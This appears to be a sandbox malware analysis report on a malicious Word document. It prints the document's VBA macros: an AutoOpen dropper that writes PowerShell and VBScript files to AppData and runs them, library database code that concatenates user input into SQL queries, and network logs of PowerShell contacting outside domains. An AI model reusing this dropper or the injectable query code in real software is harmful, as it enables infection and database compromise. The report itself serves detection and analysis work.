                                                                                              con.Execute "update dbo.Tbl_TRANSACTION set " &                 "Call_no = '" & frmTrans1.txtCall_no.Text & "', " &                 "Title = '" & frmTrans1.txtTitle.Text & "', " &                 "Author='" & frmTrans1.txtAuthor.Text & "', " &                 "Date_Borrowed='" & frmTrans1.txtBorrow.Text & "', " &                 "Date_Due='" & frmTrans1.txtDue.Text & "', " &                 "Date_Returned = '" & frmTrans1.txtReturned.Text & "', " &                 "Status = '" & frmTrans1.txtRemarks.Text & "'" &                 "where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.txtID.Text & "'"
                                                                                              
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Delete()
                                                                                                  con.Execute "Delete from dbo.Tbl_TRANSACTION" &         " where ID = '" & frmBorrower.DataGrid1.Columns.Item(0).Text & "'"
                                                                                              End Sub
                                                                                              VBA File Name: Module2.vba, Stream Size: 9376
                                                                                              General
                                                                                              Stream Path:Macros/VBA/Module2
                                                                                              VBA File Name:Module2.vba
                                                                                              Stream Size:9376
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Module2"
                                                                                              Option Explicit
                                                                                                  Global con As ADODB.Connection
                                                                                                  Global rs As ADODB.Recordset
                                                                                              
                                                                                              Public Sub Connect_Student_Trans1()
                                                                                                  On Error Resume Next
                                                                                                  Set con = New ADODB.Connection
                                                                                                  con.Open "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                                                                                                  'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLEXPRESS"
                                                                                                  End Sub
                                                                                              
                                                                                              'Public Sub View_Student_Trans1()
                                                                                              'Set rs = New ADODB.Recordset
                                                                                              'rs.Open "select *  from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                                                                                              'Set frmTrans1.DataGrid2.DataSource = rs
                                                                                              'End Sub
                                                                                              
                                                                                              Public Sub Edit_Book_Tran()
                                                                                              Set rs = New ADODB.Recordset
                                                                                                  rs.Open "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " &     "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                  frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                                  frmTrans1.txtTitle.Text = rs!Title
                                                                                                  frmTrans1.txtAuthor.Text = rs!Author
                                                                                                  frmTrans1.txtACC.Text = rs!Acc_no
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub View_StudentS_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *  from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.DataGrid1.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Search_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              If frmTrans1.cboSea.Text = "ID" Then
                                                                                              rs.Open "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSea.Text = "Lastname" Then
                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSea.Text = "Course" Then
                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              End If
                                                                                              Set frmTrans1.DataGrid1.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Search_Book1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              If frmTrans1.cboSBook.Text = "Call no" Then
                                                                                              rs.Open "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSBook.Text = "Book Name" Then
                                                                                              rs.Open "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              End If
                                                                                              Set frmTrans1.DataGrid4.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub Datagrid_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                                  rs.Open "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " &     "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                  frmTrans1.txtID.Text = rs!ID
                                                                                                  frmTrans1.lblname.Caption = rs!Firstname
                                                                                                  frmTrans1.lblmi.Caption = rs!MI
                                                                                                  frmTrans1.lbllast.Caption = rs!Lastname
                                                                                              End Sub
                                                                                              
                                                                                               Public Sub Display_borrower()
                                                                                                 Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.Datagrid3.DataSource = rs
                                                                                              
                                                                                               End Sub
                                                                                              
                                                                                              'Public Sub View_Trans3()
                                                                                              'Set rs = New ADODB.Recordset
                                                                                              'rs.Open "select *  from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                                                                                              'Set frmTrans1.DataGrid5.DataSource = rs
                                                                                              'End Sub
                                                                                              
                                                                                              Public Sub View_Trans3result()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *  from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.DataGrid4.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub OkBorrowed()
                                                                                              con.Execute "insert into dbo.Tbl_TRANSACTION values(" &                 "'" & frmTrans1.txtID.Text & "'," &                 "'" & frmTrans1.txtCall_no.Text & "'," &                 "'" & frmTrans1.txtTitle.Text & "'," &                 "'" & frmTrans1.txtAuthor.Text & "'," &                 "'" & frmTrans1.txtACC.Text & "'," &                 "'" & frmTrans1.txtBorrow.Text & "'," &                 "'" & frmTrans1.txtDue.Text & "'," &                 "'" & frmTrans1.txtReturned.Text & "'," &                 "'" & frmTrans1.txtRemarks.Text & "')"
                                                                                                  frmTrans1.palen.Caption = 1
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub Display_list()
                                                                                                Set rs = New ADODB.Recordset
                                                                                                  rs.Open "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " &     "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                               frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                               frmTrans1.txtTitle.Text = rs!Title
                                                                                               frmTrans1.txtAuthor.Text = rs!Author
                                                                                               frmTrans1.txtACC.Text = rs!Acc_no
                                                                                              End Sub
                                                                                              
                                                                                               Public Sub Returned()
                                                                                               Set rs = New ADODB.Recordset
                                                                                                       rs.Open "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                       frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                                       frmTrans1.txtTitle.Text = rs!Title
                                                                                                       frmTrans1.txtAuthor.Text = rs!Author
                                                                                                       frmTrans1.txtACC.Text = rs!Acc_no
                                                                                                       frmTrans1.txtBorrow.Text = rs!Date_Borrowed
                                                                                                       frmTrans1.txtDue.Text = rs!Date_Due
                                                                                                       frmTrans1.txtReturned.Text = rs!Date_Returned
                                                                                                       frmTrans1.txtRemarks.Text = "Returned"
                                                                                               End Sub
                                                                                              
                                                                                              Public Sub Returned1()
                                                                                              con.Execute "update dbo.Tbl_TRANSACTION set " &                 "Call_no = '" & frmTrans1.txtCall_no.Text & "', " &                 "Title = '" & frmTrans1.txtTitle.Text & "', " &                 "Author='" & frmTrans1.txtAuthor.Text & "', " &                 "Date_Borrowed='" & frmTrans1.txtBorrow.Text & "', " &                 "Date_Due='" & frmTrans1.txtDue.Text & "', " &                 "Date_Returned = '" & frmTrans1.txtReturned.Text & "', " &                 "Status = '" & frmTrans1.txtRemarks.Text & "'" &                 "where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.txtID.Text & "'"
                                                                                              
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Delete()
                                                                                                  con.Execute "Delete from dbo.Tbl_TRANSACTION" &         " where ID = '" & frmBorrower.DataGrid1.Columns.Item(0).Text & "'"
                                                                                              End Sub
                                                                                              VBA File Name: Module3.vba, Stream Size: 3808
                                                                                              General
                                                                                              Stream Path:Macros/VBA/Module3
                                                                                              VBA File Name:Module3.vba
                                                                                              Stream Size:3808
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Module3"
                                                                                              
                                                                                              Sub YRJTYSR()
                                                                                              
                                                                                              
                                                                                              Call eFile
                                                                                              
                                                                                              End Sub
                                                                                              
                                                                                              Sub eFile()
                                                                                              
                                                                                              Dim QQ1 As Object
                                                                                              Set QQ1 = New deutsche
                                                                                              
                                                                                              On Error Resume Next
                                                                                              
                                                                                              Dim WW, ff, Ne, ii, ss, hh As String
                                                                                              
                                                                                              Dim RO, ROI As String
                                                                                              RO = Environ("USERPROFILE") & "\AppData\Roaming\"
                                                                                              
                                                                                              ss = "error.txt"
                                                                                              ROI = RO + "www.ps1"
                                                                                              ROI2 = RO + "www.txt"
                                                                                              ii = ""
                                                                                              Ne = "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"
                                                                                              
                                                                                              WW = QQ1.ttt1.Text
                                                                                              ff = Replace(WW, Ne, ii)
                                                                                              
                                                                                              WW2 = QQ1.ttt2.Text
                                                                                              ff2 = Replace(WW2, Ne, ii)
                                                                                              
                                                                                              MyFile = FreeFile
                                                                                              
                                                                                              Open ROI For Output As #MyFile
                                                                                                  Print #MyFile, ff
                                                                                              Close #MyFile
                                                                                              
                                                                                              NoHex 2
                                                                                              
                                                                                              Dim fso As New FileSystemObject
                                                                                              fso.MoveFile RO + ss, ROI
                                                                                              
                                                                                              NoHex 2
                                                                                              
                                                                                              
                                                                                              Open ROI2 For Output As #MyFile
                                                                                                  Print #MyFile, ff2
                                                                                              Close #MyFile
                                                                                              
                                                                                              NoHex 2
                                                                                              
                                                                                              
                                                                                              Dim h11 As Object
                                                                                              Set h11 = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
                                                                                              
                                                                                              h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)
                                                                                              
                                                                                              End
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub NoHex(ByVal Seconds As Double)
                                                                                                Dim EndTime As Date
                                                                                                EndTime = DateAdd("s", Seconds, Now)
                                                                                                Do
                                                                                                  DoEvents
                                                                                                Loop Until Now >= EndTime
                                                                                              End Sub
                                                                                              VBA File Name: ThisDocument.cls, Stream Size: 3312
                                                                                              General
                                                                                              Stream Path:Macros/VBA/ThisDocument
                                                                                              VBA File Name:ThisDocument.cls
                                                                                              Stream Size:3312
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "ThisDocument"
                                                                                              Attribute VB_Base = "1Normal.ThisDocument"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = True
                                                                                              Attribute VB_Customizable = True
                                                                                              Sub AutoOpen()
                                                                                              IfYes = "  workright  "
                                                                                              If lp = "  no  " Then
                                                                                              MsgBox ("  There  is  Error  ")
                                                                                              Else
                                                                                              On Error Resume Next
                                                                                               YRJTYSR
                                                                                               func1
                                                                                               func2
                                                                                               
                                                                                              End If
                                                                                              End Sub
                                                                                              Sub MergeFiles()
                                                                                                  Dim avFiles, lr As Long
                                                                                                  Dim docAct As Document, docNow As Document
                                                                                               
                                                                                                  With Application.FileDialog(msoFileDialogFilePicker)
                                                                                                      .InitialFileName = "*.doc*"
                                                                                                      .AllowMultiSelect = True
                                                                                                      If .Show = False Then Exit Sub
                                                                                                      Set docAct = ActiveDocument
                                                                                                      For lr = 1 To .SelectedItems.Count
                                                                                                          Set docNow = Documents.Open(.SelectedItems(lr))
                                                                                                          docNow.Range.Copy
                                                                                                          docAct.Range(docAct.Range.End - 1).Paste
                                                                                                          docAct.Range(docAct.Range.End - 1).InsertBreak Type:=0
                                                                                                          docNow.Close 0
                                                                                                      Next lr
                                                                                                  End With
                                                                                              End Sub
                                                                                              Function func1()
                                                                                               DoEvents
                                                                                                Selection.Delete Unit:=wdCharacter, Count:=1
                                                                                              End Function
                                                                                              
                                                                                              Function func2()
                                                                                               DoEvents
                                                                                                  Selection.WholeStory
                                                                                                  
                                                                                                  DoEvents
                                                                                                  With Selection.Font
                                                                                                      .NameFarEast = False
                                                                                                      .NameAscii = False
                                                                                                      .NameOther = False
                                                                                                      .Name = False
                                                                                                      .Hidden = False
                                                                                                  End With
                                                                                                   DoEvents
                                                                                              End Function
                                                                                              VBA File Name: UserForm1.frm, Stream Size: 1175
                                                                                              General
                                                                                              Stream Path:Macros/VBA/UserForm1
                                                                                              VBA File Name:UserForm1.frm
                                                                                              Stream Size:1175
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "UserForm1"
                                                                                              Attribute VB_Base = "0{95570FB4-F9A8-48A4-B0F7-392245E94ABE}{3A1B958B-2850-4504-93D8-E3B1B84B8470}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = False
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = False
                                                                                              VBA File Name: deutsche.frm, Stream Size: 1359
                                                                                              General
                                                                                              Stream Path:Macros/VBA/deutsche
                                                                                              VBA File Name:deutsche.frm
                                                                                              Stream Size:1359
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "deutsche"
                                                                                              Attribute VB_Base = "0{D803FC02-390F-4713-A33E-D0302CEAECAF}{603C2BE7-F2C8-4164-952A-B28BFA79AD68}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = False
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = False
                                                                                              
                                                                                              
                                                                                              Private Sub UserForm_Click()
                                                                                              
                                                                                              End Sub

                                                                                              Streams

                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                              General
                                                                                              Stream Path:\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.2359563651
                                                                                              Base64 Encoded:True
                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                              General
                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                              File Type:data
                                                                                              Stream Size:4096
                                                                                              Entropy:0.353522856521
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                              General
                                                                                              Stream Path:\x5SummaryInformation
                                                                                              File Type:data
                                                                                              Stream Size:4096
                                                                                              Entropy:0.454190467647
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: 1Table, File Type: data, Stream Size: 11683
                                                                                              General
                                                                                              Stream Path:1Table
                                                                                              File Type:data
                                                                                              Stream Size:11683
                                                                                              Entropy:5.34653855073
                                                                                              Base64 Encoded:True
                                                                                              Stream Path: Data, File Type: data, Stream Size: 63641
                                                                                              General
                                                                                              Stream Path:Data
                                                                                              File Type:data
                                                                                              Stream Size:63641
                                                                                              Entropy:7.77155370959
                                                                                              Base64 Encoded:True
                                                                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 658
                                                                                              General
                                                                                              Stream Path:Macros/PROJECT
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:658
                                                                                              Entropy:5.27414286797
                                                                                              Base64 Encoded:True
                                                                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 170
                                                                                              General
                                                                                              Stream Path:Macros/PROJECTwm
                                                                                              File Type:data
                                                                                              Stream Size:170
                                                                                              Entropy:3.38985760081
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                              General
                                                                                              Stream Path:Macros/UserForm1/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:97
                                                                                              Entropy:3.61064918306
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                              General
                                                                                              Stream Path:Macros/UserForm1/\x3VBFrame
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:266
                                                                                              Entropy:4.61410677042
                                                                                              Base64 Encoded:True
                                                                                              Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 24953
                                                                                              General
                                                                                              Stream Path:Macros/UserForm1/f
                                                                                              File Type:data
                                                                                              Stream Size:24953
                                                                                              Entropy:7.56457225744
                                                                                              Base64 Encoded:True
                                                                                              Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                                                                              General
                                                                                              Stream Path:Macros/UserForm1/o
                                                                                              File Type:empty
                                                                                              Stream Size:0
                                                                                              Entropy:0.0
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:
                                                                                              Data Raw:
                                                                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6488
                                                                                              General
                                                                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                              File Type:data
                                                                                              Stream Size:6488
                                                                                              Entropy:4.97878517463
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1295
                                                                                              General
                                                                                              Stream Path:Macros/VBA/dir
                                                                                              File Type:data
                                                                                              Stream Size:1295
                                                                                              Entropy:6.66258059973
                                                                                              Base64 Encoded:True
                                                                                              Stream Path: Macros/deutsche/\x1CompObj, File Type: data, Stream Size: 97
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:97
                                                                                              Entropy:3.61064918306
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: Macros/deutsche/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 293
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/\x3VBFrame
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:293
                                                                                              Entropy:4.6019336942
                                                                                              Base64 Encoded:True
                                                                                              Stream Path: Macros/deutsche/f, File Type: data, Stream Size: 25453
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/f
                                                                                              File Type:data
                                                                                              Stream Size:25453
                                                                                              Entropy:7.53927539842
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . ( . H . . . . . . . @ . . . . . . . . . . . } . . . y . . . A . . . . . . . . . . . R . . . . . . . . . . . K . Q l t . . # a . . . . . . . . J F I F . . . . . ` . ` . . . . . F E x i f . . M M . * . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Stream Path: Macros/deutsche/i08/\x1CompObj, File Type: data, Stream Size: 115
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:115
                                                                                              Entropy:4.80096587863
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                              Stream Path: Macros/deutsche/i08/f, File Type: data, Stream Size: 176
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/f
                                                                                              File Type:data
                                                                                              Stream Size:176
                                                                                              Entropy:2.97906999268
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . $ . H . . . . . . . . . . . . . . . . } . . g . . . ; . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 a b 4 5 . . . , . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . , . . . . . . . . . . . . . . . . . . .
                                                                                              Stream Path: Macros/deutsche/i08/i10/\x1CompObj, File Type: data, Stream Size: 110
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i10/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:110
                                                                                              Entropy:4.63372611993
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                              Stream Path: Macros/deutsche/i08/i10/f, File Type: data, Stream Size: 56
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i10/f
                                                                                              File Type:data
                                                                                              Stream Size:56
                                                                                              Entropy:2.34097456399
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: Macros/deutsche/i08/i10/o, File Type: empty, Stream Size: 0
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i10/o
                                                                                              File Type:empty
                                                                                              Stream Size:0
                                                                                              Entropy:0.0
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:
                                                                                              Data Raw:
                                                                                              Stream Path: Macros/deutsche/i08/i11/\x1CompObj, File Type: data, Stream Size: 110
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i11/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:110
                                                                                              Entropy:4.63372611993
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                              Stream Path: Macros/deutsche/i08/i11/f, File Type: data, Stream Size: 40
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i11/f
                                                                                              File Type:data
                                                                                              Stream Size:40
                                                                                              Entropy:1.85677964945
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: Macros/deutsche/i08/i11/o, File Type: empty, Stream Size: 0
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i11/o
                                                                                              File Type:empty
                                                                                              Stream Size:0
                                                                                              Entropy:0.0
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:
                                                                                              Data Raw:
                                                                                              Stream Path: Macros/deutsche/i08/o, File Type: data, Stream Size: 148
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/o
                                                                                              File Type:data
                                                                                              Stream Size:148
                                                                                              Entropy:2.94288068709
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . l . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g . . . ; . . . . . . . P a g e 1 . i . . . . . P a g e 2 . i . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a b 4 . . . . . . . .
                                                                                              Stream Path: Macros/deutsche/i08/x, File Type: data, Stream Size: 48
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/x
                                                                                              File Type:data
                                                                                              Stream Size:48
                                                                                              Entropy:1.50393263469
                                                                                              Base64 Encoded:False
                                                                                              Stream Path: Macros/deutsche/o, File Type: data, Stream Size: 27655
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/o
                                                                                              File Type:data
                                                                                              Stream Size:27655
                                                                                              Entropy:7.58599422597
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . H . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . A . . . . . . . . H . , . . . . & . . . ] . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . . . . . . . . . . . . . g . . . . R . . . . . . . . . . . K . Q l t . . # a . . . . . . . . J F I F . . . . . ` . ` . . . . . F E x i f . . M M . * . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . C . . . . . . . .
                                                                                              Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                              General
                                                                                              Stream Path:WordDocument
                                                                                              File Type:data
                                                                                              Stream Size:4096
                                                                                              Entropy:1.19381836644
                                                                                              Base64 Encoded:False

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Nov 25, 2021 18:39:51.752552032 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.752564907 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.050285101 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.052012920 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:52.052037954 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.353887081 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.356327057 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.356519938 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.356550932 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:52.356913090 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:52.357350111 CET49172443192.168.2.22143.95.80.83

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 18:39:43.991426945 CET | 192.168.2.22 | 8.8.8.8 | 0x7aee | Standard query (0) | ghapan.com | A (IP address) | IN (0x0001)
Nov 25, 2021 18:39:45.994435072 CET | 192.168.2.22 | 8.8.8.8 | 0xeeb | Standard query (0) | gruasingenieria.pe | A (IP address) | IN (0x0001)
Nov 25, 2021 18:39:47.986946106 CET | 192.168.2.22 | 8.8.8.8 | 0xfab2 | Standard query (0) | yoowi.net | A (IP address) | IN (0x0001)
Nov 25, 2021 18:39:51.105479002 CET | 192.168.2.22 | 8.8.8.8 | 0x9a82 | Standard query (0) | chaturanga.groopy.com | A (IP address) | IN (0x0001)
Nov 25, 2021 18:39:53.603638887 CET | 192.168.2.22 | 8.8.8.8 | 0xc2b7 | Standard query (0) | lotolands.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 18:39:44.028645992 CET | 8.8.8.8 | 192.168.2.22 | 0x7aee | No error (0) | ghapan.com | | 136.243.74.161 | A (IP address) | IN (0x0001)
Nov 25, 2021 18:39:46.162559986 CET | 8.8.8.8 | 192.168.2.22 | 0xeeb | No error (0) | gruasingenieria.pe | | 192.185.17.114 | A (IP address) | IN (0x0001)
Nov 25, 2021 18:39:48.327522039 CET | 8.8.8.8 | 192.168.2.22 | 0xfab2 | No error (0) | yoowi.net | | 210.211.111.87 | A (IP address) | IN (0x0001)
Nov 25, 2021 18:39:51.143021107 CET | 8.8.8.8 | 192.168.2.22 | 0x9a82 | No error (0) | chaturanga.groopy.com | | 143.95.80.83 | A (IP address) | IN (0x0001)
Nov 25, 2021 18:39:53.641560078 CET | 8.8.8.8 | 192.168.2.22 | 0xc2b7 | Name error (3) | lotolands.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• ghapan.com
• gruasingenieria.pe
• yoowi.net
• chaturanga.groopy.com

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 136.243.74.161 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-25 17:39:44 UTC | 0 | OUT | GET /Kdg73onC3oQ/090921.html HTTP/1.1
Host: ghapan.com
Connection: Keep-Alive
2021-11-25 17:39:44 UTC | 0 | IN | HTTP/1.1 302 Found
Connection: close
Content-Type: text/html
Content-Length: 683
Date: Thu, 25 Nov 2021 17:39:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Location: https://ghapan.com/cgi-sys/suspendedpage.cgi
2021-11-25 17:39:44 UTC | 0 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
